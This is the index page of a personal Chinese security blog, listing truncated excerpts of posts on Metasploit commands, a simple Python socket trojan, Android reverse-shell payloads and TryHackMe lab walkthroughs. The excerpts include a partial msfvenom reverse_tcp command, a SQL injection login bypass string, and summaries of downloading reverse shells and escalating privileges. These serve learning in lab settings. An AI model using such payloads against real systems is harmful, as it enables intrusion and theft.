矢坕个人博客

我想说的话，给予最真挚的你
心之草木，向阳而生
                            
                            msfconsole命令集
                        
                                msfconsole命令集0x01 参数-p, –payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-l, –list [module_type] 列
                            
                                2024-07-22
                            
                                矢坕
                                
                            渗透工具命令集合
                        
                            python爬虫脚本编写
                        
                                python爬虫脚本编写
简介：Python爬虫，又称为网络爬虫或网页蜘蛛，是一种自动化浏览互联网并抓取网页信息的程序。Python因其简洁的语法、丰富的库支持（如requests、BeautifulSoup、Scrapy等）以及强大的网络
                            
                                2024-07-12
                            
                                矢坕
                                
                            安全编程基础
                        
                            利用socket实现简单木马
                        
                                Python：socket实现简单木马
ps：实现无限挂后台
原理：将目标机本身作为TCP协议服务器，开启本网卡所有监听，由攻击机远程socket连接，实现命令执行

附上源码：
# 服务器端木马源码：

import socket
imp
                            
                                2024-07-09
                            
                                矢坕
                                
                            python安全编程
                        
                            渗透取证（day8）
                        
                                TryHackMe系列之overpass2hacked
当作为运营人员时，发现了异常并且抓到了流量包，此时就可以对pcap文件进行解析，溯源黑客的攻击过程。
输入http查看网页端访问流量：

右击选取追踪流TCP查看相应的http的访问：
                            
                                2024-04-20
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            浅试kali渗透安卓
                        
                                浅试kali渗透安卓
生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.128 LPORT=5556 R > 
                            
                                2024-04-18
                            
                                矢坕
                                
                            Android渗透
                        
                            哈希值破解与gtfobins提权查询神器（day7）
                        
                                TryHackMe系列之daily bugle
信息收集
访问80端口：

Joomlascan工具dirsearch扫描目录发现/administrator路径

同时也发现/README.txt,访问可以发现joom
                            
                                2024-04-16
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            smb服务信息收集与tar命令利用（day6）
                        
                                TryHackMe系列之Skynet
信息收集

有smb服务，以及22、80端口
shell获取打开80端口，啥也没有

用diresearch扫描，发现目录/squirrelmail

访问：

smb服务信息收集
使用nma
                            
                                2024-04-15
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            sqlmap与反向ssh隧道服务（day5）
                        
                                TryHackMe系列之Game Zone
信息收集
sql注入登录为单引号闭合，在账号框输入
'or 1=1 -- -

成功登录下一个界面，查询页面抓包，保存至burp.txt文件准备利用sqlmap进行注入攻击

                                2024-04-14
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            hydra暴力破解登录（day4）
                        
                                TryHackMe系列之Hackpark
思路总结web查找漏洞突破web服务进入靶机获取普通shell，本地开启http服务，靶机利用shell wget下载msfconsole生成的反弹shell文件到temp文件夹，载入PEASS-n
                            
                                2024-04-13
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            window身份验证令牌提权（day3）
                        
                                TryHackMe系列之Alfred
思路总结JenKins项目创建选择window命令执行，写好攻击命令，选择build now 执行下载Invoke-PowerShellTcp.ps1脚本并执行获取普通shell，同样利用shell获取
                            
                                2024-04-10
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            window权限提升枚举（day2）
                        
                                TryHackMe系列之Steel Mountain
ps：做了5次的靶场，每次都是因为靶场有问题导致要从开，来来回回将近2个半小时
信息收集先nmap扫描靶机：

两个web服务8080、80端口
Rejetto：CVE-2014-628
                            
                                2024-04-09
                            
                                矢坕
                                
                            TryHackMe系列
                        
                            id_rsa文件窃取私钥登入（day1）
                        
                                TryHackMe系列之Kenobi
ps:找到的国外渗透靶场，花了我点小米，看起来对新手较为的友好，里面有较为完整的学习渗透路径
接下来就是长期的更新和学习，Fighting！

知识点本次挑战涵盖的主题：

nmap端口扫描+脚本枚举服
                            
                                2024-04-08
                            
                                矢坕
                                
                            TryHackMe系列